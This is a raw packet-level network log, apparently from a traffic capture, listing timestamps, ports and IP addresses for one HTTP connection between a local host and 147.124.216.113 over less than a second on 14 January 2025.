Jan 14, 2025 08:08:11.802355051 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802391052 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802408934 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802426100 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802439928 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802449942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802465916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802469015 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802480936 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802495003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802509069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802519083 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802525043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802541018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802544117 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802568913 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.803311110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803344011 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803374052 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.803469896 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803585052 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803605080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803618908 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803621054 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.803632975 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803648949 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803663015 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803663969 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.803678036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.803709030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.803738117 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.804389954 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804413080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804425955 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804440975 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804446936 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.804455996 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804471970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804471970 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.804487944 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804502964 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804517031 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804532051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.804543018 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.804543018 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.804565907 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.805128098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805143118 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805166006 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805180073 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805186987 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.805196047 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805210114 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.805219889 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805234909 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805248976 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805253029 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.805264950 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805274963 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.805282116 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.805319071 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.806204081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.806219101 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.806232929 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.806246996 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.806263924 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.806274891 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.806274891 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.806314945 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.839592934 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839662075 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839698076 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839731932 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839764118 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839797020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839829922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839835882 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.839835882 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.839835882 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.839863062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839896917 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839920044 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.839931965 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839966059 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.839984894 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.840003014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840039968 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840054989 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.840410948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840445042 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840475082 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.840477943 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840511084 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840532064 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.840544939 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840594053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840605974 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.840919018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840969086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.840977907 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841003895 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841036081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841059923 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841069937 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841103077 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841125965 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841192007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841224909 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841252089 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841258049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841293097 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841310024 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841815948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841866016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841877937 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841901064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841933012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841957092 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.841983080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.841998100 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842011929 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842027903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842032909 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.842041016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842055082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842076063 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.842098951 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.842931032 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842964888 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.842988968 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.842998981 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843031883 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843054056 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843079090 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843111038 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843133926 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843143940 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843178034 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843202114 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843210936 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843245029 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843264103 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843719959 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843735933 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843750954 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843765020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843771935 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843781948 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843795061 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843797922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843813896 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.843838930 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.843877077 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.892894030 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892915010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892940998 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892956972 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892971039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892986059 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.892982960 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893001080 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893017054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893079996 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893079996 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893079996 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893218040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893230915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893245935 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893284082 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893325090 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893366098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893373013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893382072 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893403053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893416882 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893429995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893446922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893462896 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893471956 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893496037 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893508911 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893522978 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893524885 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893538952 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893553972 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893568039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893582106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893595934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893595934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893608093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893618107 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.893623114 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.893667936 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894157887 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894212008 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894309044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894323111 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894337893 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894362926 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894377947 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894377947 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894393921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894408941 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894411087 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894427061 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894442081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894449949 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894464970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894469023 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894517899 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894846916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894861937 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894876957 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894900084 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894908905 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894923925 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894937992 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894944906 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894953012 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894968987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.894980907 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.894984961 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.895000935 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.895013094 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.895016909 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.895034075 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.895040989 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.895050049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.895081997 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930003881 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930027962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930047989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930063009 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930064917 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930083036 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930088043 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930099010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930114985 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930126905 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930140018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930155039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930166960 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930171967 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930202007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930212975 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930216074 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930241108 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930258989 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930279016 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930289030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930322886 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930356026 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930407047 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930438995 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930470943 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930504084 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930504084 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930517912 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930531025 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930543900 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930577040 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930577040 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930763960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930798054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930823088 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930831909 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930865049 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930886030 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930897951 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930929899 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.930951118 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.930963039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931018114 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.931638956 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931708097 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931742907 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931765079 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.931776047 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931828022 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931828976 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.931862116 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931895018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931916952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.931926966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931961060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.931979895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.931993008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932027102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932046890 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932060003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932092905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932106972 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932126045 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932159901 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932177067 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932193041 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932224989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932245016 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932260990 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932296991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932310104 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932329893 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932363987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932378054 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932395935 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932427883 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932446957 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932460070 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932492018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932513952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932528973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932543993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932575941 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932579041 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932611942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932631969 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932720900 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932753086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932786942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932790995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932820082 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932842016 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.932854891 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.932948112 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.983706951 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983776093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983818054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983867884 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983900070 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983931065 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.983963013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.983963013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.983987093 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984035015 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984036922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984071970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984088898 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.984106064 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984148979 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.984164953 CET	49737	80	192.168.2.4	147.124.216.113
